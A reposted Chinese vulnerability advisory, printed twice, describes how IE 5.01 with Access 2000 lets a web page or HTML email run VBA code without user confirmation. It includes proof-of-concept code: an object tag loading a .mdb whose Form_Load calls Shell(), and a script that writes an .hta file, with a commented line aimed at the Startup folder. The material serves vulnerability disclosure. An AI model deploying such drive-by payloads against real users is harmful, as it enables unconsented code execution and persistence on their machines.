微软 IE5.01 和 Access 2000 可使用户执行恶意 VBA 代码 (APP,缺陷) (转)
新客网 XKER.COM 2003-07-11 来源: 收藏本文
微软 IE5.01 和 Access 2000 可使用户执行恶意 VBA 代码 (APP,缺陷)
涉及程序:
Microsoft Internet Explorer 5.01、Microsoft Access 2000
描述:
微软 IE5.01 和 Access 2000 可使用户执行恶意 VBA 代码
详细:
受影响的系统:
Microsoft Access 2000
+ Microsoft Office 2000
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000
如果用户使用 IE 5.01 和 Access 2000,有可能被服务器远程执行 Visual Basic for Applications (VBA) 代码。通过 WWW 页面或使用了 IFRAME 的 HTML 格式的邮件,可以在远程浏览者的计算机上执行 VBA 代码,而无需用户确认。创建包含VBA代码的 *.mdb 文件,其中的 shell() 调用足以执行客户方任意已知的可执行文件。接下来,在 HTML 页面中通过 object tag 引用这些恶意的 *.mdb 文件,当浏览器加载这页面的时候,VBA代码将被执行。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)
Exit_Command0_Click:
Exit Sub
Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub
---------------------------------------------------
---------------------------------------------------
<object data="Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
//sh1.object.SaveAs("C:\\windows\\Start
Menu\\Programs\\StartUp\\georgi-xla.hta",6);
alert(fn+" sucessfully written");
}
setTimeout("f()",5000);
</SCRIPT>
---------------------------------------------------
涉及程序:
Microsoft Internet Explorer 5.01、Microsoft Access 2000
描述:
微软 IE5.01 和 Access 2000 可使用户执行恶意 VBA 代码
详细:
受影响的系统:
Microsoft Access 2000
+ Microsoft Office 2000
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000
如果用户使用 IE 5.01 和 Access 2000,有可能被服务器远程执行 Visual Basic for Applications (VBA) 代码。通过 WWW 页面或使用了 IFRAME 的 HTML 格式的邮件,可以在远程浏览者的计算机上执行 VBA 代码,而无需用户确认。创建包含VBA代码的 *.mdb 文件,其中的 shell() 调用足以执行客户方任意已知的可执行文件。接下来,在 HTML 页面中通过 object tag 引用这些恶意的 *.mdb 文件,当浏览器加载这页面的时候,VBA代码将被执行。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)
Exit_Command0_Click:
Exit Sub
Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub
---------------------------------------------------
---------------------------------------------------
<object data="Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
//sh1.object.SaveAs("C:\\windows\\Start
Menu\\Programs\\StartUp\\georgi-xla.hta",6);
alert(fn+" sucessfully written");
}
setTimeout("f()",5000);
</SCRIPT>
---------------------------------------------------
最新相关文章- ·ASP+ACCESS数据库中文乱码问题解决
- ·编程实例 字母+数字验证码程序
- ·ASP连接数据库错误解决办法新法
- ·初学:ASP内建对象Response
- ·ASP网站Server object error的解决办法
- ·ASP技巧:让Len,Left,Right函数识别中文
- ·把网页中的电话号码生成图片的ASP程序
- ·ASP如何实现IE地址栏参数的判断
- ·细化解析:ASP连接11种数据库语法集锦
- ·ASP实现网页打开任何类型文件都保存
- ·ASP代码直接增加、删除ACCESS表和字段
- ·ASP:判断访问是否来自搜索引擎的函数
- ·ASP技巧:禁用页面缓存的五种方法
- ·学习ASP关于与变量子类型相关的函数
- ·ASP开发中的(VBScript)类基础学习
- ·ASP访问Excel文件
发表评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
阅读排行
- 使用bcdedit 更改windows vista 的启动顺序
- Session丢失问题解决方案
- NTFS文件系统的安全属性
- 在DataGridView中获得DataGridViewCheckBoxColumn
- asp http 500 - 内部服务器错误 请求的资源在使用
- windows内核初窥(一)------体系结构
- WIN32下DELPHI中的多线程【线程的调度】(二)
- 一种Windows下线程同步的实现方法
- windows内核初窥(二)-----系统机制
- WIN32下DELPHI中的多线程【变量存储】(三)
- 【最新】IP 地址分配表(14)
- 关于DataGridView中如何接收处于编辑状态下的当前
- Microsoft Internet Transfer Control 使用简介(
- [小技巧]winfrom使用多线程
- 八大法则杜绝ASP网站漏洞入侵
随机推荐
- 看到有人问如何取中文为2的指定字符串字节数,研
- An ASP Class for XML Data Transfer(vbs类生成xm
- 我写ASP时常用到的一些函数
- 从文本文件中读取信息并存储入数据库
- 如何获得asp页面的载入时间(转)
- 最近经常见到有人问长英文不自动换行的问题,里面
- ASP分页显示之乱盖
- 一个简单的ASP.NET Forms 身份认证
- 在Remoting Server上取得Remoting Client的IP地址
- 在邮件内容中显示附件中的图片
- 用联接来查询两个表
- 在DataGrid页眉上添加全选的CheckBox控件
- 如何检测备注字段的字节数
- 如何增强ASP程序性能(3)
- 网络考场(13)(转)testtop.asp
实用信息推荐